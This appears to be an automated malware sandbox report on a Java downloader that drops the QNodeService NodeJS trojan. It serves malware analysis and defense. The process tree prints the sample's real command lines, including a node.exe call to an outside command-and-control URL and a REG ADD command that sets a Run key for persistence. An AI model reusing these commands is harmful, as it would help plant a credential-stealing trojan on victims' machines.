Analysis
-
max time kernel
109s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
21-07-2020 09:54
Static task
static1
Behavioral task
behavioral1
Sample
Product Details and Specification For New Order_076-21-7.jar
Resource
win7
Behavioral task
behavioral2
Sample
Product Details and Specification For New Order_076-21-7.jar
Resource
win10v200430
General
-
Target
Product Details and Specification For New Order_076-21-7.jar
-
Size
12KB
-
MD5
7843ac9b285fa41873baa3425de7d725
-
SHA1
d381507d4eabdbaaf413314a6addbb26b5960b1f
-
SHA256
3a3961d2bb39feebdd50c84bd6d9c1d2b572ebd2bb96a9d7898ac4b7cfaee8ed
-
SHA512
a2cc3eea6e6a34ef0a9fd760dc4bde9fea9c8994343c795330c31ede25a147479543df28dd77a0efd076bb26f0ee2d4a6a73a9adbef29b309489067b5d2d803f
Malware Config
Signatures
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 wtfismyip.com 13 wtfismyip.com -
Executes dropped EXE 2 IoCs
pid Process 1076 node.exe 2284 node.exe -
Loads dropped DLL 4 IoCs
pid Process 2284 node.exe 2284 node.exe 2284 node.exe 2284 node.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral2/files/0x000100000001ad8f-106.dat js behavioral2/files/0x000100000001ad8f-112.dat js -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-67922880 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-67922880.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2416 wrote to memory of 1076 2416 java.exe 69 PID 2416 wrote to memory of 1076 2416 java.exe 69 PID 1076 wrote to memory of 1760 1076 node.exe 70 PID 1076 wrote to memory of 1760 1076 node.exe 70 PID 1760 wrote to memory of 1696 1760 cmd.exe 71 PID 1760 wrote to memory of 1696 1760 cmd.exe 71 PID 1076 wrote to memory of 2284 1076 node.exe 72 PID 1076 wrote to memory of 2284 1076 node.exe 72 -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2284 node.exe 2284 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfd1-108.dat family_qnodeservice -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Product Details and Specification For New Order_076-21-7.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://baram11775.dyn.home-webserver.de2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-67922880" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-67922880.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-67922880" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-67922880.cmd\""4⤵
- Adds Run key to start application
PID:1696
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://baram11775.dyn.home-webserver.de3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2284
-
-